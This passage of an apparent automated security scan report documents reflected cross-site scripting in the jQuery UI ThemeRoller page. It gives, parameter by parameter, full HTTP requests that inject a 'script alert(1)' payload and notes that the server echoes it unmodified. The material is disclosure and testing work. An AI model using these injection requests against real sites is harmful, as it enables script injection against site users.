GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa83c49"><script>alert(1)</script>ad9a9cee216&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:01:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85965"><script>alert(1)</script>e49abec7f00 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d385965"><script>alert(1)</script>e49abec7f00&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:02:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e06"><script>alert(1)</script>8dae9211155 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a21e06"><script>alert(1)</script>8dae9211155&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79175"><script>alert(1)</script>f925903eea7 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa79175"><script>alert(1)</script>f925903eea7&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2395b"><script>alert(1)</script>8ecdffb1e74 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa12395b"><script>alert(1)</script>8ecdffb1e74&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b414b"><script>alert(1)</script>cbdbb3617a4 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999b414b"><script>alert(1)</script>cbdbb3617a4&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:03:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b14a3"><script>alert(1)</script>3eca6ed1bd7 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxb14a3"><script>alert(1)</script>3eca6ed1bd7&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b395e"><script>alert(1)</script>c7a91a75fbb was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxb395e"><script>alert(1)</script>c7a91a75fbb HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:07:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7834"><script>alert(1)</script>35a9a1124a8 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121e7834"><script>alert(1)</script>35a9a1124a8&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:04:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c18bf"><script>alert(1)</script>445200790c3 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222c18bf"><script>alert(1)</script>445200790c3&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:01:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eb74"><script>alert(1)</script>eed56a15338 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555558eb74"><script>alert(1)</script>eed56a15338&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:03:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af1b1"><script>alert(1)</script>62cef94653f was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0aaf1b1"><script>alert(1)</script>62cef94653f&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:05:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d06"><script>alert(1)</script>26968f44dc0 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f9d06"><script>alert(1)</script>26968f44dc0&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf963"><script>alert(1)</script>72faaf79734 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
